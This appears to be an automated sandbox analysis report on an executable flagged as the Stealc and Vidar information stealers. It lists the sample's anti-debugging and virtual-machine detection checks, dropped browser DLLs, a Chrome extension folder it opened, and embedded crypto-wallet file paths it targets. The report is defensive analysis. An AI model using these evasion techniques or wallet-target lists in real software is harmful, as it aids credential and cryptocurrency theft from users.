Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 876A6E second address: 876A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F2CBC52916Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 876A81 second address: 876A86 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 876BC6 second address: 876BE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F2CBC529174h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 876E3D second address: 876E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F2CBD27C5B1h 0x0000000f popad 0x00000010 jl 00007F2CBD27C5AEh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 876E61 second address: 876E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87B3BB second address: 87B3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87B3C4 second address: 87B3CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87B3CA second address: 87B3CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87B3CE second address: 87B3D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 882C6E second address: 882C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 882C75 second address: 882C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 882C7B second address: 882C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88C7BC second address: 88C7C6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2CBC529166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88C7C6 second address: 88C7DC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2CBD27C5AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 899913 second address: 899917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 899917 second address: 89992B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2CBD27C5A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F2CBD27C5ACh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A812E second address: 8A8149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 je 00007F2CBC52916Ch 0x0000000c jl 00007F2CBC529166h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A857A second address: 8A8586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 je 00007F2CBD27C5A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A8586 second address: 8A858D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A858D second address: 8A8599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A8F41 second address: 8A8F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8ABAF8 second address: 8ABAFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8ABAFC second address: 8ABB02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8ABDBA second address: 8ABDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8ABDC0 second address: 8ABDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AC0D6 second address: 8AC0DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AC0DA second address: 8AC0E4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2CBC529166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AC0E4 second address: 8AC0EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AC0EA second address: 8AC115 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edx, dword ptr [ebp+122D3925h] 0x00000011 push dword ptr [ebp+122D1FEBh] 0x00000017 mov dword ptr [ebp+124754BAh], edi 0x0000001d call 00007F2CBC529169h 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AC115 second address: 8AC11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AC11A second address: 8AC13B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jne 00007F2CBC529166h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edi 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 pop edi 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b pushad 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AC13B second address: 8AC143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AC143 second address: 8AC157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2CBC529166h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AC157 second address: 8AC15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AC15B second address: 8AC176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBC529177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0363 second address: 4EF037B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2CBD27C5B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF037B second address: 4EF037F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF037F second address: 4EF039D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2CBD27C5B3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF039D second address: 4EF03A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF03A3 second address: 4EF03A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF03A7 second address: 4EF03E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBC52916Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f mov di, si 0x00000012 movzx ecx, dx 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007F2CBC529173h 0x0000001d pop ebp 0x0000001e pushad 0x0000001f movzx eax, bx 0x00000022 push eax 0x00000023 push edx 0x00000024 mov dl, 0Bh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0439 second address: 4EF0454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBD27C5B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0D45 second address: 4EF0D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2CBC52916Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0D55 second address: 4EF0D6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2CBD27C5ADh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0D6D second address: 4EF0D73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0D73 second address: 4EF0D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 621AEB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 61F3E2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 8527FC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7C540F instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 9.9 %

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003D4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_003CDA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_003CE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_003CBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003CF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_003D3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003C16D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_003D38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_003CED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_003D4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003CDE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003C1160 GetSystemInfo,ExitProcess,

0_2_003C1160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1917116646.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1917116646.0000000000E92000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1917116646.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1917116646.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWj
Source: file.exe, 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58250
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58253
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-59440
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58271
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58265
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58305

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C5E5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C5E5FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003C45C0 VirtualProtect ?,00000004,00000100,00000000

0_2_003C45C0

Source: C:\Users\user\Desktop\file.exe

0_2_003D9860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D9750 mov eax, dword ptr fs:[00000030h]

0_2_003D9750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_003D7850

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6C5BB66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6C5BB1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 6936, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_003D9600

Source: file.exe, file.exe, 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C5BB341 cpuid

0_2_6C5BB341

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_003D7B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_003D6920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_003D7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_003D7A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1917116646.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1689803053.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 6936, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
